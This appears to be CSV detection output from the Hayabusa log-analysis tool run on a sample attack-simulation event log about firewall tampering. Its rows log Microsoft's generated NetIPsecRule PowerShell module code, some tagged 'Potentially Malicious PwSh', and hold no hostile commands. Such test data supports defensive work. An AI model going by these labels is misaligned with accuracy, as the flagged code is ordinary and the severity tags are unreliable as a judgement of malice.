[ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] 
[PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirew",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.774 +00:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"} if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 
'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = 
$true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Rename', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Rename-NetIPsecRule' -Alias '*' function Copy-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] 
[Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, 
[Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', 
Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] 
[Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirew",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.774 +00:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"allInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] 
${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewPolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewGPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewName}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] 
[Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if 
($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', 
$__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contai",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule 
activation.evtx +2021-04-23 10:09:44.774 +00:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"allInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] 
